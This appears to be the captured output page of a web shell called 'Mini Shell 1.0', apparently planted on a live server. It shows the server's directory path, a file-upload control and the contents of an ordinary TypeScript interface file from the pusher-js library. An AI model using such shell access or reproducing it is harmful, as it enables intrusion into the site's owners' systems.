HOME


Mini Shell 1.0
Redirecting to https://devs.lapieza.net/iniciar-sesion Redirecting to https://devs.lapieza.net/iniciar-sesion.
DIR: /var/www/negocios.lapieza.do/node_modules/pusher-js/src/core/transports/
Upload File :
Current File : /var/www/negocios.lapieza.do/node_modules/pusher-js/src/core/transports/url_scheme.ts
export interface URLSchemeParams {
  useTLS: boolean;
  hostTLS: string;
  hostNonTLS: string;
  httpPath: string;
}

interface URLScheme {
  getInitial(key: string, params: any): string;
  getPath?(key: string, options: any): string;
}

export default URLScheme;